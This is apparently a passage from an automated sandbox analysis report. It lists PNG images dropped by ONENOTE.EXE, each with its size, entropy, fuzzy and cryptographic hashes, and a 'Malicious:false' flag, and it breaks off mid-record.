                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                          MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                          SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                          SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                          SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.950380155401321
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                          MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                          SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                          SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                          SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14553
                                                                                                                                                                                                          Entropy (8bit):7.951135681293377
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                          MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                          SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                          SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                          SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8184
                                                                                                                                                                                                          Entropy (8bit):7.807848176906598
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                          MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                          SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                          SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                          SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1924
                                                                                                                                                                                                          Entropy (8bit):7.836744258175623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                          MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                          SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                          SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                          SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11886
                                                                                                                                                                                                          Entropy (8bit):7.946442244439929
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                          MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                          SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                          SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                          SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2270
                                                                                                                                                                                                          Entropy (8bit):7.845368393313232
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                          MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                          SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                          SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                          SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16003
                                                                                                                                                                                                          Entropy (8bit):7.959532793770661
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                          MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                          SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                          SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                          SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13241
                                                                                                                                                                                                          Entropy (8bit):7.931391290415517
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                          MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                          SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                          SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                          SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4190
                                                                                                                                                                                                          Entropy (8bit):7.94161730428269
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                          MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                          SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                          SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                          SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4081
                                                                                                                                                                                                          Entropy (8bit):7.943373267196131
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                          MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                          SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                          SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                          SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22634
                                                                                                                                                                                                          Entropy (8bit):7.974332204835705
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                          MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                          SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                          SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                          SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17289
                                                                                                                                                                                                          Entropy (8bit):7.962998633267186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                          MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                          SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                          SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                          SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13737
                                                                                                                                                                                                          Entropy (8bit):7.916899917415529
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                          MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                          SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                          SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                          SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2332
                                                                                                                                                                                                          Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                          MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                          SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                          SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                          SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11332
                                                                                                                                                                                                          Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                          MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                          SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                          SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                          SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.943341403425058
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                          MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                          SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                          SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                          SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2599
                                                                                                                                                                                                          Entropy (8bit):7.903700862190034
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                          MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                          SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                          SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                          SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1570
                                                                                                                                                                                                          Entropy (8bit):7.780157858994452
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                          MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                          SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                          SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                          SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4490
                                                                                                                                                                                                          Entropy (8bit):7.928016176674318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                          MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                          SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                          SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                          SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11449
                                                                                                                                                                                                          Entropy (8bit):7.91552812501629
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                          MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                          SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                          SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
